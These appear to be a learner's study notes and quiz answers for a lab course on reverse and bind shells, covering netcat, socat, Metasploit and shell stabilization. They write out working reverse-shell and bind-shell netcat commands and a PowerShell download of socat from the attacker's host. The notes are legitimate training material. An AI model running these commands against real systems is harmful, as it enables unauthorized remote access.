# Task 2 Tools
## Netcat

NetCat is the traditional Swiss Army Knife of networking.
It can be used to receive a reverse shell and conenct to remote ports attached to bind shells on a target system. 

- Netcat shell are very unstable

## Socat
Socat is netcat on steroids. It can do everything netcat can do, but more!
- Socat shells are more stable
- The syntax is more complex
- Socat is not usually installed by default
- Both of them can be used on Windows, which is nice

## Metasploit -- Multi/handler
The `auxiliary/multi/handler` module of the MEtasploti framework is used to receive reverse shells. 
- multi/handler provides ways to obtain stable shells
- it's the only way to interact with a meterpreter shell
- it's the easiest way to handle staged payload

## Msfvenom
- msfvenom is a standalone tool
- used to generate payloads on the fly. 

![Reverse Shell Cheat Sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

![Another Cheat Sheet](https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

![SecLists](https://github.com/danielmiessler/SecLists)


# Task 3 - Type of Shells

## Reverse Shell
- The target is forced to execute code that connects ~back~ to your computer.
- You set up a listener to recieve a connection
- Good to bypass firewall rules
- You would need to configure your own network to accept the shell
- Easier to execute

### Example
On the attacking machine:

`sudo nc -lvnp 443`

On the target:

`nc <LOCAL-IP> <PORT> -e /bin/bash`

we are listening on our own attacking machine, and sending a connection from the target.

## Bind shells
- THe code is excecuted on the target is used to start a listener attached to a shell directly on the target. 
- No need to config anything on your own network, but might be prevented by firewalls

### Example


On the target:

`nc -lvnp <port> -e "cmd.exe"`

On the attacking machine:

`nc MACHINE_IP <port>`

we are listening on the target, then connecting to it with our own machine.

## Interative Shells
- it's asking interactively that the user type either yes or no in order to continue the connection. 

## Non-Interactive Shells
- In a non-interactive shell you are limited to using programs which do not require user interaction in order to run properly.
- the majority of simple reverse and bind shells are non-interactive

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A: `R`

Q: 
You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A: `N`


Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A: `T`


# Task 4 - Netcat

## Reverse Shell
`nc -lvnp <port-number>`

    -l is used to tell netcat that this will be a listener
    -v is used to request a verbose output
    -n tells netcat not to resolve host names or use DNS. Explaining this is outwith the scope of the room.
    -p indicates that the port specification will follow.

## Bind Shells

`nc <target-ip> <chosen-port>`



Which option tells netcat to listen? `-l`

How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080? `nc 10.10.10.11 8080`

# Task 5 -Netcat Shell Stabilization
How do we make these shells more stable

## Technique 1 - Python

1) `python -c 'import pty;pty.spawn("/bin/bash")'` 
- Used to spawn a better bash shell, Replace `python` with `python2` or 3 depending on the system

2) `export TERM=xterm` , you can use `clear` now

3) CTRL + Z to background the shell. Back to our term run `stty raw -echo; fg`, you can use TAB, arrow keys and CTRIL + C now
if the shell dies, run `reset`

## Technique 2: rlwrap
- gives us access to hisory , tab, and arrow keys immediately afer receiving a shell
- Use rlwrap with different listener `rlwrap nc -lvnp- <port>`

## Technique 3 - socat

`sudo python3 -m http.server 80`

On Windows: `Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe`

Shows rows and cols: `stty -a`

Next, in your reverse/bind shell, type in:

`stty rows <number>`

and

`stty cols <number>`

How would you change your terminal size to have 238 columns?

`stty cols 238`

What is the syntax for setting up a Python3 webserver on port 80?
`sudo python3 -m http.server 80`

How would we get socat to listen on TCP port 8080?
`tcp-l:8080`